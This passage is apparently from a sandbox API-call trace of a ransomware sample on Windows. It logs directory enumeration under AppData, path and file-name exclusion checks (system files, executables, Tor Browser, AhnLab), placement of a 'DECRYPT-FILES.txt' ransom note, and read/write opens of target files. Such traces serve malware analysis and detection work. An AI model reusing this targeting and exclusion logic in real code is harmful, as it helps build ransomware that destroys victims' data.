ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0180.556] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0180.556] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0180.556] lstrcatW (in: lpString1="IMJP8_1", lpString2="\\" | out: lpString1="IMJP8_1\\") returned="IMJP8_1\\" [0180.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP8_1\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\" [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Program Files") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch=":\\Windows") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Games\\") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\All Users") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="AhnLab") returned 0x0 [0180.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0180.556] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.556] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\\\0a16c9.tmp") returned 75 [0180.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.557] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0180.557] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.557] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\\\DECRYPT-FILES.txt") returned 82 [0180.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.557] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0180.557] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*" [0180.557] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.558] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.558] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.558] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.558] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.558] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeebe5680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.558] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.558] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.558] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.558] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.558] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.558] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.558] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0180.558] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.558] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\" [0180.558] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\0a16c9.tmp" [0180.558] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.559] CloseHandle (hObject=0x0) returned 0 [0180.559] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.559] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.559] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.559] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.559] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.559] CloseHandle (hObject=0x26c) returned 1 [0180.559] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0180.559] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0180.559] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0180.559] lstrcatW (in: lpString1="IMJP9_0", lpString2="\\" | out: lpString1="IMJP9_0\\") returned="IMJP9_0\\" [0180.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\" [0180.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Program Files") returned 0x0 [0180.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch=":\\Windows") returned 0x0 [0180.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Games\\") returned 0x0 [0180.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\All Users") returned 0x0 [0180.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="AhnLab") returned 0x0 [0180.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0180.560] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.560] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\\\0a16c9.tmp") returned 75 [0180.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0180.560] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.560] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\\\DECRYPT-FILES.txt") returned 82 [0180.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0180.560] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*" [0180.560] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.561] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.561] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.561] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.561] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.561] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeebe5680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.561] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.561] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.561] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.561] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.561] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.561] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.561] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0180.561] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.561] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\" [0180.561] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\0a16c9.tmp" [0180.561] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.562] CloseHandle (hObject=0x0) returned 0 [0180.562] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.562] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9414e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.562] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.562] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9414e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.562] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.562] CloseHandle (hObject=0x26c) returned 1 [0180.562] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0180.562] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0180.562] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0180.562] lstrcatW (in: lpString1="Internet Explorer", lpString2="\\" | out: lpString1="Internet Explorer\\") returned="Internet Explorer\\" [0180.562] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0180.562] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Program Files") returned 0x0 [0180.562] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch=":\\Windows") returned 0x0 [0180.562] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Games\\") returned 0x0 [0180.562] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.562] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\All Users") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 